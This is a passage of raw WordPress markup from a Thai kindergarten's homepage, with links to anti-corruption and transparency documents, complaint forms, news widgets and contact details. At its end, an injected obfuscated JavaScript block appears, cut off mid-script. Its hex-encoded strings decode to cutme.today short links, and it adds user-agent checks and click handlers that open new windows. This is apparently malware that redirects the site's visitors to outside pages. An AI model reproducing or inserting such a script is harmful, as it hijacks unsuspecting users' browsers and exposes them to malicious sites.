900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',